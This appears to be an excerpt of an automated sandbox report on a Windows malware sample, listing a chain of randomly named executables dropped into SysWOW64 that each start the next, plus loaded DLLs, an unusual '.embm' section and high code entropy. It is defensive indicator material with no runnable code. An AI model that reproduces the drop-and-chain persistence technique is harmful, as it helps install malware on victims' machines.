                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeProcess created: C:\Windows\SysWOW64\Plbmqa32.exe C:\Windows\system32\Plbmqa32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeProcess created: C:\Windows\SysWOW64\Plgflqpn.exe C:\Windows\system32\Plgflqpn.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeProcess created: C:\Windows\SysWOW64\Pqeoao32.exe C:\Windows\system32\Pqeoao32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeProcess created: C:\Windows\SysWOW64\Qgcpihjl.exe C:\Windows\system32\Qgcpihjl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeProcess created: C:\Windows\SysWOW64\Ajkolbad.exe C:\Windows\system32\Ajkolbad.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeProcess created: C:\Windows\SysWOW64\Bmlhnnne.exe C:\Windows\system32\Bmlhnnne.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeProcess created: C:\Windows\SysWOW64\Bgamkfnl.exe C:\Windows\system32\Bgamkfnl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeProcess created: C:\Windows\SysWOW64\Bqjacldl.exe C:\Windows\system32\Bqjacldl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeProcess created: C:\Windows\SysWOW64\Bnnampcf.exe C:\Windows\system32\Bnnampcf.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeProcess created: C:\Windows\SysWOW64\Bnpnbp32.exe C:\Windows\system32\Bnpnbp32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeProcess created: C:\Windows\SysWOW64\Bgibkegc.exe C:\Windows\system32\Bgibkegc.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeProcess created: C:\Windows\SysWOW64\Baagdk32.exe C:\Windows\system32\Baagdk32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeProcess created: C:\Windows\SysWOW64\Cfnpmb32.exe C:\Windows\system32\Cfnpmb32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeProcess created: C:\Windows\SysWOW64\Ccapffke.exe C:\Windows\system32\Ccapffke.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeProcess created: C:\Windows\SysWOW64\Ceampi32.exe C:\Windows\system32\Ceampi32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ceampi32.exeProcess created: C:\Windows\SysWOW64\Cnjaioih.exe C:\Windows\system32\Cnjaioih.exe
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeProcess created: C:\Windows\SysWOW64\Camgpi32.exe C:\Windows\system32\Camgpi32.exe
                      Source: C:\Windows\SysWOW64\Camgpi32.exeProcess created: C:\Windows\SysWOW64\Dmfdkj32.exe C:\Windows\system32\Dmfdkj32.exe
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeProcess created: C:\Windows\SysWOW64\Dnhmjm32.exe C:\Windows\system32\Dnhmjm32.exe
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeProcess created: C:\Windows\SysWOW64\Dfcboo32.exe C:\Windows\system32\Dfcboo32.exe
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeProcess created: C:\Windows\SysWOW64\Edgbhcim.exe C:\Windows\system32\Edgbhcim.exe
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeProcess created: C:\Windows\SysWOW64\Emogai32.exe C:\Windows\system32\Emogai32.exe
                      Source: C:\Windows\SysWOW64\Emogai32.exeProcess created: C:\Windows\SysWOW64\Efgkjnfn.exe C:\Windows\system32\Efgkjnfn.exe
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeProcess created: C:\Windows\SysWOW64\Eoappk32.exe C:\Windows\system32\Eoappk32.exe
                      Source: C:\Windows\SysWOW64\Eoappk32.exeProcess created: C:\Windows\SysWOW64\Fkogfkdj.exe C:\Windows\system32\Fkogfkdj.exe
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeProcess created: C:\Windows\SysWOW64\Fhedeo32.exe C:\Windows\system32\Fhedeo32.exe
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeProcess created: C:\Windows\SysWOW64\Feidnc32.exe C:\Windows\system32\Feidnc32.exe
                      Source: C:\Windows\SysWOW64\Feidnc32.exeProcess created: C:\Windows\SysWOW64\Foaigifk.exe C:\Windows\system32\Foaigifk.exe
                      Source: C:\Windows\SysWOW64\Foaigifk.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\h879iieoae.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\h879iieoae.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\h879iieoae.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\h879iieoae.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Opbieagi.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Opbieagi.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Opbieagi.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Opbieagi.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oglabl32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oglabl32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oglabl32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oglabl32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Olijjb32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Olijjb32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Olijjb32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Olijjb32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oceoll32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oceoll32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oceoll32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oceoll32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Onkcje32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Onkcje32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Onkcje32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Onkcje32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Odekfoij.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Odekfoij.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Odekfoij.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Odekfoij.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ceampi32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_00402E06 GetVersion,LoadLibraryA,GetProcAddress,IsBadReadPtr,GlobalMemoryStatus,GetEnvironmentStringsW,CloseHandle,GetModuleHandleA,VirtualQuery,IsBadWritePtr,0_2_00402E06
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .embm
                      Source: h879iieoae.exeStatic PE information: section name: .embm
                      Source: Nejhbi32.exe.0.drStatic PE information: section name: .embm
                      Source: Ogjdllpi.exe.1.drStatic PE information: section name: .embm
                      Source: Opbieagi.exe.2.drStatic PE information: section name: .embm
                      Source: Oglabl32.exe.3.drStatic PE information: section name: .embm
                      Source: Olijjb32.exe.4.drStatic PE information: section name: .embm
                      Source: Oeanchcn.exe.5.drStatic PE information: section name: .embm
                      Source: Oceoll32.exe.6.drStatic PE information: section name: .embm
                      Source: Onkcje32.exe.7.drStatic PE information: section name: .embm
                      Source: Odekfoij.exe.8.drStatic PE information: section name: .embm
                      Source: Ojacofgb.exe.9.drStatic PE information: section name: .embm
                      Source: Ppllkpoo.exe.10.drStatic PE information: section name: .embm
                      Source: Plbmqa32.exe.11.drStatic PE information: section name: .embm
                      Source: Plgflqpn.exe.12.drStatic PE information: section name: .embm
                      Source: Pqeoao32.exe.13.drStatic PE information: section name: .embm
                      Source: Qgcpihjl.exe.14.drStatic PE information: section name: .embm
                      Source: Ajkolbad.exe.15.drStatic PE information: section name: .embm
                      Source: Bmlhnnne.exe.16.drStatic PE information: section name: .embm
                      Source: Bgamkfnl.exe.17.drStatic PE information: section name: .embm
                      Source: Bqjacldl.exe.18.drStatic PE information: section name: .embm
                      Source: Bnnampcf.exe.19.drStatic PE information: section name: .embm
                      Source: Bnpnbp32.exe.20.drStatic PE information: section name: .embm
                      Source: Bgibkegc.exe.21.drStatic PE information: section name: .embm
                      Source: Baagdk32.exe.22.drStatic PE information: section name: .embm
                      Source: Cfnpmb32.exe.23.drStatic PE information: section name: .embm
                      Source: Ccapffke.exe.24.drStatic PE information: section name: .embm
                      Source: Ceampi32.exe.25.drStatic PE information: section name: .embm
                      Source: Cnjaioih.exe.26.drStatic PE information: section name: .embm
                      Source: Camgpi32.exe.27.drStatic PE information: section name: .embm
                      Source: Dmfdkj32.exe.28.drStatic PE information: section name: .embm
                      Source: Dnhmjm32.exe.29.drStatic PE information: section name: .embm
                      Source: Dfcboo32.exe.30.drStatic PE information: section name: .embm
                      Source: Edgbhcim.exe.31.drStatic PE information: section name: .embm
                      Source: Emogai32.exe.32.drStatic PE information: section name: .embm
                      Source: Efgkjnfn.exe.33.drStatic PE information: section name: .embm
                      Source: Eoappk32.exe.34.drStatic PE information: section name: .embm
                      Source: Fkogfkdj.exe.35.drStatic PE information: section name: .embm
                      Source: Fhedeo32.exe.36.drStatic PE information: section name: .embm
                      Source: Feidnc32.exe.37.drStatic PE information: section name: .embm
                      Source: Foaigifk.exe.38.drStatic PE information: section name: .embm
                      Source: Ggmnlk32.exe.39.drStatic PE information: section name: .embm
                      Source: h879iieoae.exeStatic PE information: section name: .text entropy: 7.190507132248476
                      Source: Nejhbi32.exe.0.drStatic PE information: section name: .text entropy: 7.183772002837302
                      Source: Ogjdllpi.exe.1.drStatic PE information: section name: .text entropy: 7.147443164942795
                      Source: Opbieagi.exe.2.drStatic PE information: section name: .text entropy: 7.178518855910967
                      Source: Oglabl32.exe.3.drStatic PE information: section name: .text entropy: 7.185742599580611
                      Source: Olijjb32.exe.4.drStatic PE information: section name: .text entropy: 7.110531950014891
                      Source: Oeanchcn.exe.5.drStatic PE information: section name: .text entropy: 7.185357437360054
                      Source: Oceoll32.exe.6.drStatic PE information: section name: .text entropy: 7.168480651808014
                      Source: Onkcje32.exe.7.drStatic PE information: section name: .text entropy: 7.130939198292088
                      Source: Odekfoij.exe.8.drStatic PE information: section name: .text entropy: 7.174220243060091
                      Source: Ojacofgb.exe.9.drStatic PE information: section name: .text entropy: 7.131994312266599
                      Source: Ppllkpoo.exe.10.drStatic PE information: section name: .text entropy: 7.197605282946569
                      Source: Plbmqa32.exe.11.drStatic PE information: section name: .text entropy: 7.212747053446963
                      Source: Plgflqpn.exe.12.drStatic PE information: section name: .text entropy: 7.1777361111263085
                      Source: Pqeoao32.exe.13.drStatic PE information: section name: .text entropy: 7.177836248776215
                      Source: Qgcpihjl.exe.14.drStatic PE information: section name: .text entropy: 7.134079001018797
                      Source: Ajkolbad.exe.15.drStatic PE information: section name: .text entropy: 7.150402572619783
                      Source: Bmlhnnne.exe.16.drStatic PE information: section name: .text entropy: 7.194431112405807
                      Source: Bgamkfnl.exe.17.drStatic PE information: section name: .text entropy: 7.0988104927922295
                      Source: Bqjacldl.exe.18.drStatic PE information: section name: .text entropy: 7.091013664503109
                      Source: Bnnampcf.exe.19.drStatic PE information: section name: .text entropy: 7.20252439678255
                      Source: Bnpnbp32.exe.20.drStatic PE information: section name: .text entropy: 7.1751185880285115
                      Source: Bgibkegc.exe.21.drStatic PE information: section name: .text entropy: 7.158359166193943
                      Source: Baagdk32.exe.22.drStatic PE information: section name: .text entropy: 7.113332370732262
                      Source: Cfnpmb32.exe.23.drStatic PE information: section name: .text entropy: 7.113109514581295
                      Source: Ccapffke.exe.24.drStatic PE information: section name: .text entropy: 7.164772969477855
                      Source: Ceampi32.exe.25.drStatic PE information: section name: .text entropy: 7.179274547360003
                      Source: Cnjaioih.exe.26.drStatic PE information: section name: .text entropy: 7.167456147293733
                      Source: Camgpi32.exe.27.drStatic PE information: section name: .text entropy: 7.196413393675492
                      Source: Dmfdkj32.exe.28.drStatic PE information: section name: .text entropy: 7.086782180666274
                      Source: Dnhmjm32.exe.29.drStatic PE information: section name: .text entropy: 7.1935468123219515
                      Source: Dfcboo32.exe.30.drStatic PE information: section name: .text entropy: 7.176616641968521
                      Source: Edgbhcim.exe.31.drStatic PE information: section name: .text entropy: 7.1259826879390165
                      Source: Emogai32.exe.32.drStatic PE information: section name: .text entropy: 7.151027716339847
                      Source: Efgkjnfn.exe.33.drStatic PE information: section name: .text entropy: 7.165314105248902
                      Source: Eoappk32.exe.34.drStatic PE information: section name: .text entropy: 7.116004280215482
                      Source: Fkogfkdj.exe.35.drStatic PE information: section name: .text entropy: 7.127555706075136
                      Source: Fhedeo32.exe.36.drStatic PE information: section name: .text entropy: 7.18609657669522
                      Source: Feidnc32.exe.37.drStatic PE information: section name: .text entropy: 7.156173388913616
                      Source: Foaigifk.exe.38.drStatic PE information: section name: .text entropy: 7.1848996080474326
                      Source: Ggmnlk32.exe.39.drStatic PE information: section name: .text entropy: 7.179269799391079

                      Persistence and Installation Behavior

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeExecutable created and started: C:\Windows\SysWOW64\Oceoll32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeExecutable created and started: C:\Windows\SysWOW64\Ogjdllpi.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeExecutable created and started: C:\Windows\SysWOW64\Bnnampcf.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeExecutable created and started: C:\Windows\SysWOW64\Plgflqpn.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeExecutable created and started: C:\Windows\SysWOW64\Ajkolbad.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeExecutable created and started: C:\Windows\SysWOW64\Plbmqa32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeExecutable created and started: C:\Windows\SysWOW64\Bgibkegc.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Onkcje32.exeExecutable created and started: C:\Windows\SysWOW64\Odekfoij.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeExecutable created and started: C:\Windows\SysWOW64\Dnhmjm32.exe
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeExecutable created and started: C:\Windows\SysWOW64\Bmlhnnne.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Oglabl32.exeExecutable created and started: C:\Windows\SysWOW64\Olijjb32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeExecutable created and started: C:\Windows\SysWOW64\Bnpnbp32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeExecutable created and started: C:\Windows\SysWOW64\Edgbhcim.exe
                      Source: C:\Windows\SysWOW64\Emogai32.exeExecutable created and started: C:\Windows\SysWOW64\Efgkjnfn.exe
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeExecutable created and started: C:\Windows\SysWOW64\Camgpi32.exe
                      Source: C:\Windows\SysWOW64\Eoappk32.exeExecutable created and started: C:\Windows\SysWOW64\Fkogfkdj.exe
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeExecutable created and started: C:\Windows\SysWOW64\Ppllkpoo.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Opbieagi.exeExecutable created and started: C:\Windows\SysWOW64\Oglabl32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Camgpi32.exeExecutable created and started: C:\Windows\SysWOW64\Dmfdkj32.exe
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeExecutable created and started: C:\Windows\SysWOW64\Dfcboo32.exe
                      Source: C:\Windows\SysWOW64\Ceampi32.exeExecutable created and started: C:\Windows\SysWOW64\Cnjaioih.exe
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeExecutable created and started: C:\Windows\SysWOW64\Bqjacldl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeExecutable created and started: C:\Windows\SysWOW64\Eoappk32.exe
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeExecutable created and started: C:\Windows\SysWOW64\Bgamkfnl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeExecutable created and started: C:\Windows\SysWOW64\Ccapffke.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeExecutable created and started: C:\Windows\SysWOW64\Emogai32.exe
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeExecutable created and started: C:\Windows\SysWOW64\Qgcpihjl.exeJump to behavior
